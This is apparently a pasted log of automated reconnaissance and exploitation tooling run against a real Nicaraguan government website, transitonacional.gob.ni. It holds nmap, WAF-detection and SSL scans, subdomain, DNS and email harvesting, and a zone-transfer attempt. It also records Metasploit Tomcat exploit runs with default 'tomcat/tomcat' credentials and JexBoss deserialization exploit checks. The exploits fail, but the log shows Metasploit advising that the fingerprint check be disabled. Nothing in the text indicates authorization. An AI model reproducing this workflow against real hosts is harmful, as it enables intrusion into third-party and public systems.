1673. Server supports TLS Fallback SCSV
1674.  
1675. TLS renegotiation:
1676. Secure session renegotiation supported
1677.  
1678. TLS Compression:
1679. Compression disabled
1680.  
1681. Heartbleed:
1682. TLS 1.2 not vulnerable to heartbleed
1683. TLS 1.1 not vulnerable to heartbleed
1684. TLS 1.0 not vulnerable to heartbleed
1685.  
1686. Supported Server Cipher(s):
1687. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
1688. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1689. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1690. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
1691. Accepted TLSv1.2 256 bits AES256-SHA256
1692. Accepted TLSv1.2 256 bits AES256-SHA
1693. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
1694. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
1695. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1696. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
1697. Accepted TLSv1.2 128 bits AES128-SHA256
1698. Accepted TLSv1.2 128 bits AES128-SHA
1699. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1700. Accepted TLSv1.1 256 bits AES256-SHA
1701. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1702. Accepted TLSv1.1 128 bits AES128-SHA
1703. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1704. Accepted TLSv1.0 256 bits AES256-SHA
1705. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1706. Accepted TLSv1.0 128 bits AES128-SHA
1707.  
1708. SSL Certificate:
1709. Signature Algorithm: sha256WithRSAEncryption
1710. RSA Key Strength: 4096
1711.  
1712. Subject: *.rhostbh.com
1713. Altnames: DNS:*.rhostbh.com, DNS:rhostbh.com
1714. Issuer: COMODO RSA Domain Validation Secure Server CA
1715.  
1716. Not valid before: Feb 9 00:00:00 2016 GMT
1717. Not valid after: Feb 8 23:59:59 2019 GMT
1718.  
1719.  
1720. ^ ^
1721. _ __ _ ____ _ __ _ _ ____
1722. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1723. | V V // o // _/ | V V // 0 // 0 // _/
1724. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1725. <
1726. ...'
1727.  
1728. WAFW00F - Web Application Firewall Detection Tool
1729.  
1730. By Sandro Gauci && Wendel G. Henrique
1731.  
1732. Checking http://transitonacional.gob.ni:8080
1733. The site http://transitonacional.gob.ni:8080 is behind a IBM Web Application Security
1734. Number of requests: 3
1735.  
1736. http://transitonacional.gob.ni:8080/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 ERROR: Socket error Hostname not known: transitonacional.gob.ni
1737. http://transitonacional.gob.ni:8080 [301 Moved Permanently] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[50.87.39.91], PHP[5,5.2.17], RedirectLocation[http://www.transitonacional.gob.ni/], UncommonHeaders[x-acc-exp,x-proxy-cache], X-Powered-By[PHP/5.2.17], nginx[1.14.0]
1738. http://www.transitonacional.gob.ni/ [200 OK] Country[UNITED STATES][US], Email[info@transitonacional.gob.ni,transitonacional@gmail.com], Facebook-Plugin[likebox], Frame, Google-API[ajax/libs/jquery/1/jquery.min.js], Google-Analytics[Universal][UA-53950533-1], HTML5, HTTPServer[nginx/1.14.0], IP[50.87.39.91], JQuery[1.11.1,1.7.1], Modernizr, PHP[5,5.2.17], Script[text/javascript], Title[Dirección de Seguridad de Transito], UncommonHeaders[wp-super-cache,x-acc-exp,x-proxy-cache], WordPress, WordpressSuperCache, X-Powered-By[PHP/5.2.17], YouTube, nginx[1.14.0]
1739.  
1740. Version: 1.11.11-static
1741. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1742.  
1743. Connected to 50.87.39.91
1744.  
1745. Testing SSL server transitonacional.gob.ni on port 8080 using SNI name transitonacional.gob.ni
1746.  
1747. TLS Fallback SCSV:
1748. Server does not support TLS Fallback SCSV
1749.  
1750. TLS renegotiation:
1751. Session renegotiation not supported
1752.  
1753. TLS Compression:
1754. Compression disabled
1755.  
1756. Heartbleed:
1757. TLS 1.2 not vulnerable to heartbleed
1758. TLS 1.1 not vulnerable to heartbleed
1759. TLS 1.0 not vulnerable to heartbleed
1760.  
1761. Supported Server Cipher(s):
1762. #######################################################################################################################################
1763. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:23 EDT
1764. Nmap scan report for transitonacional.gob.ni (50.87.39.91)
1765. Host is up (0.21s latency).
1766. rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
1767.  
1768. PORT STATE SERVICE VERSION
1769. 8080/tcp filtered http-proxy
1770. Too many fingerprints match this host to give specific OS details
1771.  
1772. TRACEROUTE (using proto 1/icmp)
1773. HOP RTT ADDRESS
1774. 1 ... 30
1775.  
1776. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1777. Nmap done: 1 IP address (1 host up) scanned in 16.57 seconds
1778.  
1779.  
1780.  
1781. Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
1782. EFLAGS: 00010046
1783. eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
1784. esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
1785. ds: 0018 es: 0018 ss: 0018
1786. Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
1787.  
1788.  
1789. Stack: 90909090990909090990909090
1790. 90909090990909090990909090
1791. 90909090.90909090.90909090
1792. 90909090.90909090.90909090
1793. 90909090.90909090.09090900
1794. 90909090.90909090.09090900
1795. ..........................
1796. cccccccccccccccccccccccccc
1797. cccccccccccccccccccccccccc
1798. ccccccccc.................
1799. cccccccccccccccccccccccccc
1800. cccccccccccccccccccccccccc
1801. .................ccccccccc
1802. cccccccccccccccccccccccccc
1803. cccccccccccccccccccccccccc
1804. ..........................
1805. ffffffffffffffffffffffffff
1806. ffffffff..................
1807. ffffffffffffffffffffffffff
1808. ffffffff..................
1809. ffffffff..................
1810. ffffffff..................
1811.  
1812.  
1813. Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
1814. Aiee, Killing Interrupt handler
1815. Kernel panic: Attempted to kill the idle task!
1816. In swapper task - not syncing
1817.  
1818.  
1819. =[ metasploit v4.17.3-dev ]
1820. + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
1821. + -- --=[ 538 payloads - 41 encoders - 10 nops ]
1822. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
1823.  
1824. RHOSTS => transitonacional.gob.ni
1825. RHOST => transitonacional.gob.ni
1826. [-] WAR file not found
1827. [*] Auxiliary module execution completed
1828. [*] Scanned 1 of 1 hosts (100% complete)
1829. [*] Auxiliary module execution completed
1830. RPORT => 8080
1831. [*] Scanned 1 of 1 hosts (100% complete)
1832. [*] Auxiliary module execution completed
1833. [*] Attempting to connect to 50.87.39.91:8080
1834. [+] No File(s) found
1835. [*] Scanned 1 of 1 hosts (100% complete)
1836. [*] Auxiliary module execution completed
1837. [*] http://50.87.39.91:8080/admin/j_security_check - Checking j_security_check...
1838. [*] http://50.87.39.91:8080/admin/j_security_check - Server returned: 404
1839. [-] http://50.87.39.91:8080/admin/j_security_check - Unable to enumerate users with this URI
1840. [*] Scanned 1 of 1 hosts (100% complete)
1841. [*] Auxiliary module execution completed
1842. [-] http://50.87.39.91:8080 - Authorization not requested
1843. [*] Scanned 1 of 1 hosts (100% complete)
1844. [*] Auxiliary module execution completed
1845. [-] Exploit aborted due to failure: not-found: The target server fingerprint "nginx/1.14.0" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
1846. [*] Exploit completed, but no session was created.
1847. USERNAME => tomcat
1848. PASSWORD => tomcat
1849. [-] Exploit aborted due to failure: not-found: The target server fingerprint "nginx/1.14.0" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
1850. [*] Exploit completed, but no session was created.
1851. #######################################################################################################################################
1852.  
1853.  
1854.  
1855. * --- JexBoss: Jboss verify and EXploitation Tool --- *
1856. | * And others Java Deserialization Vulnerabilities * |
1857. | |
1858. | @author: João Filho Matos Figueiredo |
1859. | @contact: joaomatosf@gmail.com |
1860. | |
1861. | @update: https://github.com/joaomatosf/jexboss |
1862. #______________________________________________________#
1863.  
1864. @version: 1.2.4
1865.  
1866. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
1867.  
1868.  
1869. ** Checking Host: http://transitonacional.gob.ni:8080 **
1870.  
1871. [*] Checking admin-console: [ REDIRECT ]
1872. * The server sent a redirect to: http://www.transitonacional.gob.ni/admin-console/
1873.  
1874. [*] Checking Struts2: [ OK ]
1875. [*] Checking Servlet Deserialization: [ OK ]
1876. [*] Checking Application Deserialization: [ OK ]
1877. [*] Checking Jenkins: [ OK ]
1878. [*] Checking web-console: [ OK ]
1879. [*] Checking jmx-console: [ OK ]
1880. [*] Checking JMXInvokerServlet: [ OK ]
1881.  
1882.  
1883. * Results:
1884. The server is not vulnerable to bugs tested ... :D
1885.  
1886. * Info: review, suggestions, updates, etc:
1887. https://github.com/joaomatosf/jexboss
1888.  
1889. * DONATE: Please consider making a donation to help improve this tool,
1890. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
1891.  
1892. + -- --=[Port 8180 closed... skipping.
1893. + -- --=[Port 8443 opened... running tests...
1894.  
1895. ^ ^
1896. _ __ _ ____ _ __ _ _ ____
1897. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1898. | V V // o // _/ | V V // 0 // 0 // _/
1899. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1900. <
1901. ...'
1902.  
1903. WAFW00F - Web Application Firewall Detection Tool
1904.  
1905. By Sandro Gauci && Wendel G. Henrique
1906.  
1907. Checking http://transitonacional.gob.ni:8443
1908. Generic Detection results:
1909. No WAF detected by the generic detection
1910. Number of requests: 14
1911.  
1912. http://transitonacional.gob.ni:8443 [400 Bad Request] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[50.87.39.91], Title[400 The plain HTTP request was sent to HTTPS port], nginx[1.14.0]
1913.  
1914. Version: 1.11.11-static
1915. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1916.  
1917. Connected to 50.87.39.91
1918.  
1919. Testing SSL server transitonacional.gob.ni on port 8443 using SNI name transitonacional.gob.ni
1920.  
1921. TLS Fallback SCSV:
1922. Server supports TLS Fallback SCSV
1923.  
1924. TLS renegotiation:
1925. Secure session renegotiation supported
1926.  
1927. TLS Compression:
1928. Compression disabled
1929.  
1930. Heartbleed:
1931. TLS 1.2 not vulnerable to heartbleed
1932. TLS 1.1 not vulnerable to heartbleed
1933. TLS 1.0 not vulnerable to heartbleed
1934.  
1935. Supported Server Cipher(s):
1936. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
1937. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1938. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1939. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
1940. Accepted TLSv1.2 256 bits AES256-SHA256
1941. Accepted TLSv1.2 256 bits AES256-SHA
1942. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
1943. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
1944. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1945. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
1946. Accepted TLSv1.2 128 bits AES128-SHA256
1947. Accepted TLSv1.2 128 bits AES128-SHA
1948. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1949. Accepted TLSv1.1 256 bits AES256-SHA
1950. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1951. Accepted TLSv1.1 128 bits AES128-SHA
1952. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1953. Accepted TLSv1.0 256 bits AES256-SHA
1954. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1955. Accepted TLSv1.0 128 bits AES128-SHA
1956.  
1957. SSL Certificate:
1958. Signature Algorithm: sha256WithRSAEncryption
1959. RSA Key Strength: 4096
1960.  
1961. Subject: *.rhostbh.com
1962. Altnames: DNS:*.rhostbh.com, DNS:rhostbh.com
1963. Issuer: COMODO RSA Domain Validation Secure Server CA
1964.  
1965. Not valid before: Feb 9 00:00:00 2016 GMT
1966. Not valid after: Feb 8 23:59:59 2019 GMT
1967.  
1968.  
1969.  
1970. AVAILABLE PLUGINS
1971. -----------------
1972.  
1973. PluginCertInfo
1974. PluginHeartbleed
1975. PluginSessionRenegotiation
1976. PluginSessionResumption
1977. PluginCompression
1978. PluginOpenSSLCipherSuites
1979. PluginHSTS
1980. PluginChromeSha1Deprecation
1981.  
1982.  
1983.  
1984. CHECKING HOST(S) AVAILABILITY
1985. -----------------------------
1986.  
1987. transitonacional.gob.ni:8443 => 50.87.39.91:8443
1988.  
1989.  
1990.  
1991. SCAN RESULTS FOR TRANSITONACIONAL.GOB.NI:8443 - 50.87.39.91:8443
1992. ----------------------------------------------------------------
1993.  
1994. * Deflate Compression:
1995. OK - Compression disabled
1996.  
1997. * Session Renegotiation:
1998. Client-initiated Renegotiations: OK - Rejected
1999. Secure Renegotiation: OK - Supported
2000.  
2001. * Certificate - Content:
2002. SHA1 Fingerprint: 2d9ccc86afb7bba2a486e3d1dd7816596ebd3365
2003. Common Name: *.rhostbh.com
2004. Issuer: COMODO RSA Domain Validation Secure Server CA
2005. Serial Number: 8DB1D4FBDB8DE1FC9A9AA0BEBEB4BADC
2006. Not Before: Feb 9 00:00:00 2016 GMT
2007. Not After: Feb 8 23:59:59 2019 GMT
2008. Signature Algorithm: sha256WithRSAEncryption
2009. Public Key Algorithm: rsaEncryption
2010. Key Size: 4096 bit
2011. Exponent: 65537 (0x10001)
2012. X509v3 Subject Alternative Name: {'DNS': ['*.rhostbh.com', 'rhostbh.com']}
2013.  
2014. * Certificate - Trust:
2015. Hostname Validation: FAILED - Certificate does NOT match transitonacional.gob.ni
2016. Google CA Store (09/2015): OK - Certificate is trusted
2017. Java 6 CA Store (Update 65): OK - Certificate is trusted
2018. Microsoft CA Store (09/2015): OK - Certificate is trusted
2019. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
2020. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
2021. Certificate Chain Received: ['*.rhostbh.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
2022.  
2023. * Certificate - OCSP Stapling:
2024. NOT SUPPORTED - Server did not send back an OCSP response.
2025.  
2026. * SSLV2 Cipher Suites:
2027. Undefined - An unexpected error happened:
2028. EXP-RC4-MD5 timeout - timed out
2029. EXP-RC2-CBC-MD5 timeout - timed out
2030. DES-CBC-MD5 timeout - timed out
2031.  
2032. * Session Resumption:
2033. With Session IDs: ERROR (0 successful, 0 failed, 5 errors, 5 total attempts).
2034. ERROR #1: timeout - timed out
2035. ERROR #2: timeout - timed out
2036. ERROR #3: timeout - timed out
2037. ERROR #4: timeout - timed out
2038. ERROR #5: timeout - timed out
2039. With TLS Session Tickets: ERROR: timeout - timed out
2040.  
2041. * SSLV3 Cipher Suites:
2042. Undefined - An unexpected error happened:
2043. SRP-RSA-3DES-EDE-CBC-SHA timeout - timed out
2044. SRP-DSS-3DES-EDE-CBC-SHA timeout - timed out
2045. SRP-3DES-EDE-CBC-SHA timeout - timed out
2046. SEED-SHA timeout - timed out
2047. RC4-SHA timeout - timed out
2048. RC4-MD5 timeout - timed out
2049. PSK-RC4-SHA timeout - timed out
2050. PSK-AES128-CBC-SHA timeout - timed out
2051. PSK-3DES-EDE-CBC-SHA timeout - timed out
2052. NULL-SHA256 timeout - timed out
2053. NULL-SHA timeout - timed out
2054. NULL-MD5 timeout - timed out
2055. IDEA-CBC-SHA timeout - timed out
2056. EXP-RC4-MD5 timeout - timed out
2057. EXP-RC2-CBC-MD5 timeout - timed out
2058. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
2059. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
2060. EXP-DES-CBC-SHA timeout - timed out
2061. EXP-ADH-RC4-MD5 timeout - timed out
2062. EXP-ADH-DES-CBC-SHA timeout - timed out
2063. EDH-RSA-DES-CBC3-SHA timeout - timed out
2064. EDH-RSA-DES-CBC-SHA timeout - timed out
2065. EDH-DSS-DES-CBC3-SHA timeout - timed out
2066. EDH-DSS-DES-CBC-SHA timeout - timed out
2067. ECDHE-RSA-RC4-SHA timeout - timed out
2068. ECDHE-RSA-NULL-SHA timeout - timed out
2069. ECDHE-RSA-DES-CBC3-SHA timeout - timed out
2070. ECDHE-ECDSA-RC4-SHA timeout - timed out
2071. ECDHE-ECDSA-NULL-SHA timeout - timed out
2072. ECDHE-ECDSA-DES-CBC3-SHA timeout - timed out
2073. ECDH-RSA-RC4-SHA timeout - timed out
2074. ECDH-RSA-NULL-SHA timeout - timed out
2075. ECDH-RSA-DES-CBC3-SHA timeout - timed out
2076. ECDH-RSA-AES128-SHA256 timeout - timed out
2077. ECDH-RSA-AES128-SHA timeout - timed out
2078. ECDH-RSA-AES128-GCM-SHA256 timeout - timed out
2079. ECDH-ECDSA-RC4-SHA timeout - timed out
2080. ECDH-ECDSA-NULL-SHA timeout - timed out
2081. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
2082. ECDH-ECDSA-AES128-SHA256 timeout - timed out
2083. ECDH-ECDSA-AES128-SHA timeout - timed out
2084. ECDH-ECDSA-AES128-GCM-SHA256 timeout - timed out
2085. DH-RSA-DES-CBC3-SHA timeout - timed out
2086. DH-RSA-DES-CBC-SHA timeout - timed out
2087. DH-DSS-DES-CBC3-SHA timeout - timed out
2088. DH-DSS-DES-CBC-SHA timeout - timed out
2089. DES-CBC3-SHA timeout - timed out
2090. DES-CBC-SHA timeout - timed out
2091. CAMELLIA128-SHA timeout - timed out
2092. AES128-SHA256 timeout - timed out
2093. AES128-SHA timeout - timed out
2094. AES128-GCM-SHA256 timeout - timed out
2095. AECDH-RC4-SHA timeout - timed out
2096. AECDH-NULL-SHA timeout - timed out
2097. AECDH-DES-CBC3-SHA timeout - timed out
2098. ADH-SEED-SHA timeout - timed out
2099. ADH-RC4-MD5 timeout - timed out
2100. ADH-DES-CBC3-SHA timeout - timed out
2101. ADH-DES-CBC-SHA timeout - timed out
2102. ADH-CAMELLIA128-SHA timeout - timed out
2103.  
2104.  
2105.  
2106. SCAN COMPLETED IN 112.89 S
2107. --------------------------
2108. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:33 EDT
2109. Nmap scan report for transitonacional.gob.ni (50.87.39.91)
2110. Host is up (0.023s latency).
2111. rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
2112.  
2113. PORT STATE SERVICE VERSION
2114. 8443/tcp filtered https-alt
2115. Too many fingerprints match this host to give specific OS details
2116.  
2117. TRACEROUTE (using proto 1/icmp)
2118. HOP RTT ADDRESS
2119. 1 ... 30
2120.  
2121. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2122. Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
2123. #######################################################################################################################################
2124.  
2125.  
2126. * --- JexBoss: Jboss verify and EXploitation Tool --- *
2127. | * And others Java Deserialization Vulnerabilities * |
2128. | |
2129. | @author: João Filho Matos Figueiredo |
2130. | @contact: joaomatosf@gmail.com |
2131. | |
2132. | @update: https://github.com/joaomatosf/jexboss |
2133. #______________________________________________________#
2134.  
2135. @version: 1.2.4
2136.  
2137. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
2138.  
2139.  
2140. ** Checking Host: https://transitonacional.gob.ni:8443 **
2141.  
2142. [*] Checking admin-console: [ OK ]
2143. [*] Checking Struts2: [ OK ]
2144. [*] Checking Servlet Deserialization: [ OK ]
2145. [*] Checking Application Deserialization: [ OK ]
2146. [*] Checking Jenkins: [ OK ]
2147. [*] Checking web-console: [ OK ]
2148. [*] Checking jmx-console: [ OK ]
2149. [*] Checking JMXInvokerServlet: [ OK ]
2150.  
2151.  
2152. * Results:
2153. The server is not vulnerable to bugs tested ... :D
2154.  
2155. * Info: review, suggestions, updates, etc:
2156. https://github.com/joaomatosf/jexboss
2157.  
2158. * DONATE: Please consider making a donation to help improve this tool,
2159. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
2160.  
2161. #######################################################################################################################################
2162.  
2163. I, [2018-08-08T10:33:30.257241 #29485] INFO -- : Initiating port scan
2164. I, [2018-08-08T19:48:21.693769 #29485] INFO -- : Using nmap scan output file logs/nmap_output_2018-08-08_10-33-30.xml
2165. I, [2018-08-08T19:48:21.694894 #29485] INFO -- : Discovered open port: 50.87.39.91:80
2166. I, [2018-08-08T19:48:23.961078 #29485] INFO -- : Discovered open port: 50.87.39.91:443
2167. I, [2018-08-08T19:48:27.940128 #29485] INFO -- : Discovered open port: 50.87.39.91:993
2168. I, [2018-08-08T19:48:32.730060 #29485] INFO -- : Discovered open port: 50.87.39.91:995
2169. I, [2018-08-08T19:48:37.761590 #29485] INFO -- : Discovered open port: 50.87.39.91:8080
2170. I, [2018-08-08T19:48:40.098698 #29485] INFO -- : <<<Enumerating vulnerable applications>>>
2171. --------------------------------------------------------
2172. <<<Yasuo discovered following vulnerable applications>>>
2173. --------------------------------------------------------
2174. +----------+--------------------+-------------------+----------+----------+
2175. | App Name | URL to Application | Potential Exploit | Username | Password |
2176. +----------+--------------------+-------------------+----------+----------+
2177. +----------+--------------------+-------------------+----------+----------+
2178. ######################################################################################################################################
2179. =======================================================================================================================================
2180. Emails 1
2181. Hosts 3
2182. DNS Records 6
2183. Subdomains 6
2184.  
2185. Emails (1)
2186. =======================================================================================================================================
2187. info@transitonacional.gob.ni
2188.  
2189. Hosts (3)
2190. ======================================================================================================================================
2191. 50.87.39.91
2192. 162.159.24.66
2193. 162.159.25.91
2194.  
2195. DNS Records (6)
2196. =======================================================================================================================================
2197. transitonacional.gob.ni A 50.87.39.91
2198. transitonacional.gob.ni MX 50.87.39.91
2199. ns1.rhostbh.com NS 162.159.24.66
2200. ns2.rhostbh.com NS 162.159.25.91
2201. ns1.rhostbh.com SOA 162.159.24.66
2202. transitonacional.gob.ni TXT v=spf1 a mx ptr include:rhostbh.com ?all
2203.  
2204. Subdomains (6)
2205. =======================================================================================================================================
2206. autodiscover.transitonacional.gob.ni 50.87.39.91
2207. ftp.transitonacional.gob.ni 50.87.39.91
2208. mail.transitonacional.gob.ni 50.87.39.91
2209. transitonacional.gob.ni 50.87.39.91
2210. webmail.transitonacional.gob.ni 50.87.39.91
2211. www.transitonacional.gob.ni 50.87.39.91
2212.  
2213. Loadbalancing
2214. =======================================================================================================================================
2215. Checking for DNS-Loadbalancing:
2216. NOT FOUND
2217.  
2218. Checking for HTTP-Loadbalancing [Server]:
2219. nginx/1.14.0
2220. NOT FOUND
2221.  
2222. Checking for HTTP-Loadbalancing [Date]:
2223. 16:44:17, 16:44:19, 16:44:21, 16:44:23, 16:44:25, 16:44:27, 16:44:30, 16:44:32, 16:44:34, 16:44:36,
2224. 16:44:38, 16:44:41, 16:44:43, 16:44:45, 16:44:47, 16:44:49, 16:44:51, 16:44:54, 16:44:56, 16:44:58,
2225. 16:45:00, 16:45:02, 16:45:04, 16:45:07, 16:45:09, 16:45:11, 16:45:13, 16:45:15, 16:45:17, 16:45:20,
2226. 16:45:23, 16:45:25, 16:45:27, 16:45:29, 16:45:31, 16:45:33, 16:45:35, 16:45:37, 16:45:39, 16:45:41,
2227. 16:45:44, 16:45:46, 16:45:48, 16:45:50, 16:45:52, 16:45:54, 16:45:57, 16:45:59, 16:46:01, 16:46:03,
2228. NOT FOUND
2229.  
2230. Checking for HTTP-Loadbalancing [Diff]:
2231. NOT FOUND
2232.  
2233.  
2234. Web Application Firewall
2235. =======================================================================================================================================
2236. The site is behind a ModSecurity (OWASP CRS)
2237. The site seems to be behind a WAF or some sort of security solution
2238. Reason: The server returned a different response code when a string trigged the blacklist.
2239. Normal response code is "404", while the response code to an attack is "406"
2240.  
2241. Traceroute
2242. =======================================================================================================================================
2243. UDP
2244. 1 * *
2245. 2 * *
2246. 3 * *
2247. 4 * *
2248. 5 * *
2249. 6 * *
2250. 7 * *
2251. 8 * *
2252. 9 * *
2253. 10 * *
2254. 11 * *
2255. 12 * *
2256. 13 * *
2257. 14 * *
2258. 15 * *
2259. 16 * *
2260. 17 * *
2261. 18 * *
2262. 19 * *
2263. 20 * *
2264. 21 * *
2265. 22 * *
2266. 23 * *
2267. 24 * *
2268. 25 * *
2269. 26 * *
2270. 27 * *
2271. 28 * *
2272. 29 * *
2273. 30 * *
2274.  
2275. ICMP ECHO
2276. 1 public-gw.vpngate.net (10.211.254.254)
2277. 2 ntt.setup (192.168.1.1)
2278. 3 153.153.239.251 (153.153.239.251)
2279. 4 153.153.239.209 (153.153.239.209)
2280. 5 118.23.46.73 (118.23.46.73)
2281. 6 180.8.119.129 (180.8.119.129)
2282. 7 153.149.219.49 (153.149.219.49)
2283. 8 153.149.219.146 (153.149.219.146)
2284. 9 ae-12.r02.osakjp02.jp.bb.gin.ntt.net (61.200.80.9)
2285. 10 ae-3.r24.osakjp02.jp.bb.gin.ntt.net (129.250.2.41)
2286. 11 ae-2.r22.snjsca04.us.bb.gin.ntt.net (129.250.2.118)
2287. 12 ae-40.r02.snjsca04.us.bb.gin.ntt.net (129.250.3.121)
2288. 13 ae-0.a01.snjsca04.us.bb.gin.ntt.net (129.250.3.163)
2289. 14 ae-0.endurance.snjsca04.us.bb.gin.ntt.net (129.250.195.138)
2290. 15 162-144-240-169.unifiedlayer.com (162.144.240.169)
2291. 16 162-144-240-111.unifiedlayer.com (162.144.240.111)
2292. 17 50-87-39-91.unifiedlayer.com (50.87.39.91)
2293.  
2294. TCP SYN
2295. 1 50-87-39-91.unifiedlayer.com (50.87.39.91)
2296.  
2297. Zone Transfer
2298. =======================================================================================================================================
2299. Resolving SOA Record
2300. SOA ns1.rhostbh.com 162.159.24.66
2301. Resolving NS Records
2302. NS ns2.rhostbh.com 162.159.25.91
2303. NS ns1.rhostbh.com 162.159.24.66
2304.  
2305. Trying NS server 162.159.25.91
2306. No answer or RRset not for qname
2307.  
2308. Trying NS server 162.159.24.66
2309. No answer or RRset not for qname
2310.  
2311. Whatweb
2312. =======================================================================================================================================
2313. autodiscover.rhostbh.com/ [ Unassigned]
2314.  
2315. HTTPServer[nginx/1.14.0]
2316. IP[50.87.39.91]
2317. RedirectLocation[autodiscover.rhostbh.com/]
2318. Title[301 Moved Permanently]
2319. nginx[1.14.0]
2320.  
2321. HTTPServer[nginx/1.14.0]
2322. IP[50.87.39.91]
2323. Script
2324. Title[Bluehost.com]
2325. nginx[1.14.0]
2326.  
2327. Email[info@transitonacional.gob.ni
2328. transitonacional@gmail.com]
2329. Facebook-Plugin[likebox]
2330. Frame
2331. Google-API[ajax/libs/jquery/1/jquery.min.js]
2332. Google-Analytics[Universal] [UA-53950533-1]
2333. HTML5
2334. HTTPServer[nginx/1.14.0]
2335. IP[50.87.39.91]
2336. JQuery[1.11.1
2337. 1.7.1]
2338. Modernizr
2339. PHP[5.2.17]
2340. Script[text/javascript]
2341. Title[Dirección de Seguridad de Transito]
2342. UncommonHeaders[link
2343. x-acc-exp
2344. x-proxy-cache]
2345. WordPress
2346. WordpressSuperCache
2347. X-Powered-By[PHP/5.2.17]
2348. YouTube
2349. nginx[1.14.0]
2350.  
2351. HTTPServer[nginx/1.14.0]
2352. IP[50.87.39.91]
2353. PHP[5.2.17]
2354. RedirectLocation[www.transitonacional.gob.ni/]
2355. UncommonHeaders[x-acc-exp
2356. x-proxy-cache]
2357. X-Powered-By[PHP/5.2.17]
2358. nginx[1.14.0]
2359.  
2360. HTTPServer[nginx/1.14.0]
2361. IP[50.87.39.91]
2362. Script
2363. Title[Bluehost.com]
2364. nginx[1.14.0]
2365.  
2366. Email[info@transitonacional.gob.ni
2367. transitonacional@gmail.com]
2368. Facebook-Plugin[likebox]
2369. Frame
2370. Google-API[ajax/libs/jquery/1/jquery.min.js]
2371. Google-Analytics[Universal] [UA-53950533-1]
2372. HTML5
2373. HTTPServer[nginx/1.14.0]
2374. IP[50.87.39.91]
2375. JQuery[1.11.1
2376. 1.7.1]
2377. Modernizr
2378. PHP[5.2.17]
2379. Script[text/javascript]
2380. Title[Dirección de Seguridad de Transito]
2381. UncommonHeaders[wp-super-cache
2382. x-acc-exp
2383. x-proxy-cache]
2384. WordPress
2385. WordpressSuperCache
2386. X-Powered-By[PHP/5.2.17]
2387. YouTube
2388. nginx[1.14.0]
2389.  
2390. Email[info@transitonacional.gob.ni
2391. transitonacional@gmail.com]
2392. Facebook-Plugin[likebox]
2393. Frame
2394. Google-API[ajax/libs/jquery/1/jquery.min.js]
2395. Google-Analytics[Universal] [UA-53950533-1]
2396. HTML5
2397. HTTPServer[nginx/1.14.0]
2398. IP[50.87.39.91]
